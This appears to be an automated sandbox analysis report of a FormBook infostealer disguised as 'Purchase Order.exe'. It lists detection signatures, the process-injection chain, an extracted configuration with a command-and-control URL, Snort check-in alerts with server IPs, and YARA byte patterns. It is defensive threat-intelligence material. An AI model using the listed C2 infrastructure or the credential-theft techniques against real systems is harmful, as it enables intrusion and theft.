Edit tour

Windows Analysis Report
Purchase Order.exe

Overview

General Information

Sample Name:	Purchase Order.exe
Analysis ID:	728988
MD5:	b0fcec089ad6578e526554a0865b5bff
SHA1:	d62e44c9af2f7aefffd7cb200306c845413a9b3c
SHA256:	5d954998ba8c1086f196cf2572f0690b97c5fba623d0ca057cea74dd77aae5e0
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Found hidden mapped module (file has been removed from disk)

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

Executable has a suspicious name (potential lure to open the executable)

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found inlined nop instructions (likely shell or obfuscated code)

PE file does not import any functions

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Connects to several IPs in different countries

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

Purchase Order.exe (PID: 1380 cmdline: C:\Users\user\Desktop\Purchase Order.exe MD5: B0FCEC089AD6578E526554A0865B5BFF)

sphybwtjm.exe (PID: 4444 cmdline: C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe MD5: E9A4818AC7164F4FF1B2ABFD99B75F6C)

sphybwtjm.exe (PID: 3760 cmdline: C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe MD5: E9A4818AC7164F4FF1B2ABFD99B75F6C)

explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

rundll32.exe (PID: 5008 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5656 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 492 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.majordaiyanoace.com/hcfu/"], "decoy": ["MxvCqbTgB2s=", "nVcWxUAuQKS44zlwgbwM", "Sc1g9Ub8P6aHq9xfc4A=", "21HdeQwZYqV/nY+v8mZIkA==", "Leo3X7Ti2i+IEePVKHI9Pu+JBqU=", "7Z+FJnElTX8GryxwgbwM", "blflEmGYyy2KHYWeGGDvPNyx", "0ru3RmfB8lxwmRtaaZfIi3HHJ60=", "ZyPeb+H2L42hef8P", "4Y3Y3ixXgZv/k9I=", "WNXMabxuj/TRydYfneWm+4LFmA==", "kVGfyBhGhOBE89NwgbwM", "LuIjJTOcxSl+CawnN4NWlg==", "blfe/Tp0f6wEmR9wgbwM", "4JNyGmcUf7JI7w==", "Me7NarNljMAXwbTIDVmecF4=", "bhVd22trtq2Gi835BzVk4e0vG68ConxJ", "m0yRoKbvn3fVw6bQVQ==", "1HvDwdXOGH9QEJSPQA==", "kQ2jKmkbMEdYVcU=", "Rw1NZN9LeNMw37jq6OR8lQ==", "kleSp/P6o4gymLfZVw==", "y7OuRFvOE4EQwp5CR0FIjQ==", "LKonriYrYsDtOk0+hMSJmA==", "93PvZ65uxTIWKx/zaLkEikXn6ERbTA==", "q64gS0PRf7JI7w==", "vjvLYePfDH+hbT6i590E", "M/AoQZDGCmqRjXzBSg==", "xIXK3RFhedeyxSlohYkyPu+JBqU=", "OyQ1OshVo75N8Q==", "Cthlh4oSkLLJw3nBAXHZRp8iSRhrUw==", "u0RL8Dfv/ysGKS96fYY=", "qrIhRkjTf7JI7w==", "763k+34Nf7JI7w==", "Cbv9EF1Zuu5O", "NewnMFMyS35ONSFPkkJVmg==", "G88OJqEvm81a9A==", "yX9M8DPj+mmEprhiqZk=", "mUeSsvUzVIDymLfZVw==", "mJElukExbq+Kr9xfc4A=", "qVaXoOMLDGzPa2+28mZIkA==", "UzTHX796vy67dG+p8mZIkA==", "vW82cb7k9BZslebNHmiuTCNKlGZNK9c=", "hEyKjaZRofpT", "VwTYZ3XZBXT6dtT/m1mecF4=", "Qu+6UZhaow7imLfZVw==", "WQDLfQ//Kph+o/sWnPyFVO+JBqU=", "UwnUXHMDU25KVs0=", "hzXja/H4IZCbuiNwgbwM", "c1voZ+XmY4VaXM0=", "77SAFGUjQqKFsSNwgbwM", "Ewr8k+uau+E0mLfZVw==", "yku/x8gRmwRX", "WBniaXoEJ2L3q53tPsZxeSQEkA==", "z8Db8nLwNKL7f3O38mZIkA==", "nTt2lB9Zuu5O", "tWk97HNzujJMdscfdZuA3MMfEh0ConxJ", "OuiBa+10qAmh//f/Ww==", "kksg0FE0Vopul+4en1mecF4=", "p5MeqT84VaxLkaGZ/GBGhA==", "hDmQsS+uwB/4/fYPYY1OmwreKrg=", "rEeOktkON56y1v5Ch7UE", "FYV8BRWU1zxXMwsip+SPmA==", "44/AWZlQSXBVj/BTnKM+QrS8tNQ//bqVFA=="]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0b9:$sqlite3step: 68 34 1C 7B E1 0x1ac31:$sqlite3step: 68 34 1C 7B E1 0x1a0fb:$sqlite3text: 68 38 2A 90 C5 0x1ac76:$sqlite3text: 68 38 2A 90 C5 0x1a112:$sqlite3blob: 68 53 D8 7F 8C 0x1ac8c:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0b9:$sqlite3step: 68 34 1C 7B E1 0x1ac31:$sqlite3step: 68 34 1C 7B E1 0x1a0fb:$sqlite3text: 68 38 2A 90 C5 0x1ac76:$sqlite3text: 68 38 2A 90 C5 0x1a112:$sqlite3blob: 68 53 D8 7F 8C 0x1ac8c:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6d38:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f777:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xafe6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1851e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1831c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17dc8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1841e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x18596:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xabb1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x17013:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1e4ee:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f4e1:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a7f0:$sqlite3step: 68 34 1C 7B E1 0x1b368:$sqlite3step: 68 34 1C 7B E1 0x1a832:$sqlite3text: 68 38 2A 90 C5 0x1b3ad:$sqlite3text: 68 38 2A 90 C5 0x1a849:$sqlite3blob: 68 53 D8 7F 8C 0x1b3c3:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0b9:$sqlite3step: 68 34 1C 7B E1 0x1ac31:$sqlite3step: 68 34 1C 7B E1 0x1a0fb:$sqlite3text: 68 38 2A 90 C5 0x1ac76:$sqlite3text: 68 38 2A 90 C5 0x1a112:$sqlite3blob: 68 53 D8 7F 8C 0x1ac8c:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0b9:$sqlite3step: 68 34 1C 7B E1 0x1ac31:$sqlite3step: 68 34 1C 7B E1 0x1a0fb:$sqlite3text: 68 38 2A 90 C5 0x1ac76:$sqlite3text: 68 38 2A 90 C5 0x1a112:$sqlite3blob: 68 53 D8 7F 8C 0x1ac8c:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0b9:$sqlite3step: 68 34 1C 7B E1 0x1ac31:$sqlite3step: 68 34 1C 7B E1 0x1a0fb:$sqlite3text: 68 38 2A 90 C5 0x1ac76:$sqlite3text: 68 38 2A 90 C5 0x1a112:$sqlite3blob: 68 53 D8 7F 8C 0x1ac8c:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x78dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xedb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xfdaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb0b9:$sqlite3step: 68 34 1C 7B E1 0xbc31:$sqlite3step: 68 34 1C 7B E1 0xb0fb:$sqlite3text: 68 38 2A 90 C5 0xbc76:$sqlite3text: 68 38 2A 90 C5 0xb112:$sqlite3blob: 68 53 D8 7F 8C 0xbc8c:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: sphybwtjm.exe PID: 3760	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5d6b0:$a1: 3C 30 50 4F 53 54 74 09 40 0x883b7:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: rundll32.exe PID: 5008	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x60128:$a1: 3C 30 50 4F 53 54 74 09 40 0xb43eb:$a1: 3C 30 50 4F 53 54 74 09 40 0x120148:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.sphybwtjm.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.sphybwtjm.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6f38:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f977:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb1e6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1871e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.sphybwtjm.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1851c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17fc8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1861e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x18796:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xadb1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x17213:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1e6ee:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f6e1:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.sphybwtjm.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a9f0:$sqlite3step: 68 34 1C 7B E1 0x1b568:$sqlite3step: 68 34 1C 7B E1 0x1aa32:$sqlite3text: 68 38 2A 90 C5 0x1b5ad:$sqlite3text: 68 38 2A 90 C5 0x1aa49:$sqlite3blob: 68 53 D8 7F 8C 0x1b5c3:$sqlite3blob: 68 53 D8 7F 8C

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 3.13.90.76

Timestamp:	192.168.2.73.13.90.7649734802031449 10/24/22-11:09:04.619981
SID:	2031449
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 3.13.90.76

Timestamp:	192.168.2.73.13.90.7649734802031412 10/24/22-11:09:04.619981
SID:	2031412
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 51.79.230.147

Timestamp:	192.168.2.751.79.230.14749714802031453 10/24/22-11:07:25.079506
SID:	2031453
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 51.79.230.147

Timestamp:	192.168.2.751.79.230.14749714802031412 10/24/22-11:07:25.079506
SID:	2031412
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 3.13.90.76

Timestamp:	192.168.2.73.13.90.7649734802031453 10/24/22-11:09:04.619981
SID:	2031453
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.top domain - Likely Hostile - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.853336532023883 10/24/22-11:07:30.440332
SID:	2023883
Source Port:	53336
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 51.79.230.147

Timestamp:	192.168.2.751.79.230.14749714802031449 10/24/22-11:07:25.079506
SID:	2031449
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Purchase Order.exe	Virustotal: Detection: 44%			Perma Link
Source: Purchase Order.exe	ReversingLabs: Detection: 64%

Yara detected FormBook

Source: Yara match	File source: 2.2.sphybwtjm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.searchvity.com/	URL Reputation: Label: malware
Source: http://www.searchvity.com/?dn=	URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\EEF0.tmp

Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen2

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\EEF0.tmp	ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	ReversingLabs: Detection: 69%

Machine Learning detection for sample

Source: Purchase Order.exe

Joe Sandbox ML: detected

Source: 16.2.rundll32.exe.4803814.4.unpack	Avira: Label: TR/ATRAPS.Gen5
Source: 16.2.rundll32.exe.6e4cd8.0.unpack	Avira: Label: TR/ATRAPS.Gen5

Source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.majordaiyanoace.com/hcfu/"], "decoy": ["MxvCqbTgB2s=", "nVcWxUAuQKS44zlwgbwM", "Sc1g9Ub8P6aHq9xfc4A=", "21HdeQwZYqV/nY+v8mZIkA==", "Leo3X7Ti2i+IEePVKHI9Pu+JBqU=", "7Z+FJnElTX8GryxwgbwM", "blflEmGYyy2KHYWeGGDvPNyx", "0ru3RmfB8lxwmRtaaZfIi3HHJ60=", "ZyPeb+H2L42hef8P", "4Y3Y3ixXgZv/k9I=", "WNXMabxuj/TRydYfneWm+4LFmA==", "kVGfyBhGhOBE89NwgbwM", "LuIjJTOcxSl+CawnN4NWlg==", "blfe/Tp0f6wEmR9wgbwM", "4JNyGmcUf7JI7w==", "Me7NarNljMAXwbTIDVmecF4=", "bhVd22trtq2Gi835BzVk4e0vG68ConxJ", "m0yRoKbvn3fVw6bQVQ==", "1HvDwdXOGH9QEJSPQA==", "kQ2jKmkbMEdYVcU=", "Rw1NZN9LeNMw37jq6OR8lQ==", "kleSp/P6o4gymLfZVw==", "y7OuRFvOE4EQwp5CR0FIjQ==", "LKonriYrYsDtOk0+hMSJmA==", "93PvZ65uxTIWKx/zaLkEikXn6ERbTA==", "q64gS0PRf7JI7w==", "vjvLYePfDH+hbT6i590E", "M/AoQZDGCmqRjXzBSg==", "xIXK3RFhedeyxSlohYkyPu+JBqU=", "OyQ1OshVo75N8Q==", "Cthlh4oSkLLJw3nBAXHZRp8iSRhrUw==", "u0RL8Dfv/ysGKS96fYY=", "qrIhRkjTf7JI7w==", "763k+34Nf7JI7w==", "Cbv9EF1Zuu5O", "NewnMFMyS35ONSFPkkJVmg==", "G88OJqEvm81a9A==", "yX9M8DPj+mmEprhiqZk=", "mUeSsvUzVIDymLfZVw==", "mJElukExbq+Kr9xfc4A=", "qVaXoOMLDGzPa2+28mZIkA==", "UzTHX796vy67dG+p8mZIkA==", "vW82cb7k9BZslebNHmiuTCNKlGZNK9c=", "hEyKjaZRofpT", "VwTYZ3XZBXT6dtT/m1mecF4=", "Qu+6UZhaow7imLfZVw==", "WQDLfQ//Kph+o/sWnPyFVO+JBqU=", "UwnUXHMDU25KVs0=", "hzXja/H4IZCbuiNwgbwM", "c1voZ+XmY4VaXM0=", "77SAFGUjQqKFsSNwgbwM", "Ewr8k+uau+E0mLfZVw==", "yku/x8gRmwRX", "WBniaXoEJ2L3q53tPsZxeSQEkA==", "z8Db8nLwNKL7f3O38mZIkA==", "nTt2lB9Zuu5O", "tWk97HNzujJMdscfdZuA3MMfEh0ConxJ", "OuiBa+10qAmh//f/Ww==", "kksg0FE0Vopul+4en1mecF4=", "p5MeqT84VaxLkaGZ/GBGhA==", "hDmQsS+uwB/4/fYPYY1OmwreKrg=", "rEeOktkON56y1v5Ch7UE", "FYV8BRWU1zxXMwsip+SPmA==", "44/AWZlQSXBVj/BTnKM+QrS8tNQ//bqVFA=="]}

Source: Purchase Order.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Purchase Order.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

